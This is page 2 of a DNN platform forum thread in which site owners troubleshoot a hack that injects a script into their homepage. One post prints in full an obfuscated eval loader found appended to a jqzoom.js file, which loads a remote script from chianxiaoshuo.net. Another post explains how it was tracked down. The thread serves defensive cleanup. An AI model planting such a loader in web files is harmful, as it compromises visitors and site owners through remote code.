DNN Forums

Ask questions about your website to get help learning DNN and help resolve issues.
  • Search Forums
    Advanced Search
Prev
Next
Forums Using DNN Platform Administration and Configuration

hacked with unknown image

 15 Replies
 5 Subscribed to this topic
 40 Subscribed to this forum
Sort:
Page 2 of 2 << < 12
Author
Messages
Tycho de Waard (SU)
Veteran Member
Posts: 838
Veteran Member
3 Helpful Replier
Helpful Replier
Thanks for being such a helpful replier!
New Poster
New Poster
Congrats on posting!
4/21/2022 1:14 PM
Just an FYI, Franc: I did not receive any credentials.
Franc
Growing Member
Posts: 48
Growing Member
4/21/2022 1:55 PM

the ip address is [Removed by Host - do not publish IP addresses] I emailed the credential a minute ago from [Removed by Host - do not publish email addresses] this info is the the email as well

bicklp
New Around Here
Posts: 5
New Around Here
8/11/2022 5:36 AM
Hi, did you find out what was causing this ... I have just taken over a client site and they have a script file being injected in to the head of their page that also goes to chianxiaoshuo


it is not in the source of the page so is coming from somewhere at runtime, its only on the main page of the site, not any sub pages so i thought it could be the skin file being used for the homepage but cannot see anything in there for it. i have looked for weird .aspx files and searched the database as in the previous messages ... cannot find where it is coming from ...

Thanks
bicklp
New Around Here
Posts: 5
New Around Here
8/11/2022 5:58 AM

never mind, i found it, something had been appended to the bottom of a jqzoom.js file 

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 1=2.5(\'1\');1.3(\'6\',\'7/8\');1.3(\'9\',"a://b.c.d/e/f.g");2.h(\'i\')[0].j(1);',20,20,'|script|document|setAttribute|var|createElement|type|text|javascript|src|https|www|chianxiaoshuo|net|api|main|js|getElementsByTagName|head|appendChild'.split('|'),0,{}));

Franc
Growing Member
Posts: 48
Growing Member
8/15/2022 10:58 AM

how did you find it? I don't have a file jqzoom.js 

bicklp
New Around Here
Posts: 5
New Around Here
8/15/2022 11:07 AM
It wasn't in the page source so was loading at run time. So did it the hard way :-/ ... loaded the page, went into the inspector then clicked on every js file to bring up the source and searched for the url in the code. Found it about the 5th file but went through the rest anyway. Must have had access to the root of the site at some point, probably from a telerick component and appended the code to the bottom of a random js file the site was using. If you have something that can index and search contents of all your files that will be easier but I didn't have that. Also as said above don't go on the file date, the files were dated years ago but I have a copy of the original file here from the install, same date, but no extra code.
Page 2 of 2 << < 12

These Forums are for the discussion of the open source CMS DNN platform and ecosystem.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. If you have (suspected) security issues, please DO NOT post them in the forums but instead follow the official DNN security policy
  2. No Advertising. This includes the promotion of commercial and non-commercial products or services which are not directly related to DNN.
  3. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  4. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  5. No Flaming or Trolling.
  6. No Profanity, Racism, or Prejudice.
  7. Site Moderators have the final word on approving / removing a thread or post or comment.
  8. English language posting only, please.

Would you like to help us?

Awesome! Simply post in the forums using the link below and we'll get you started.

Get Involved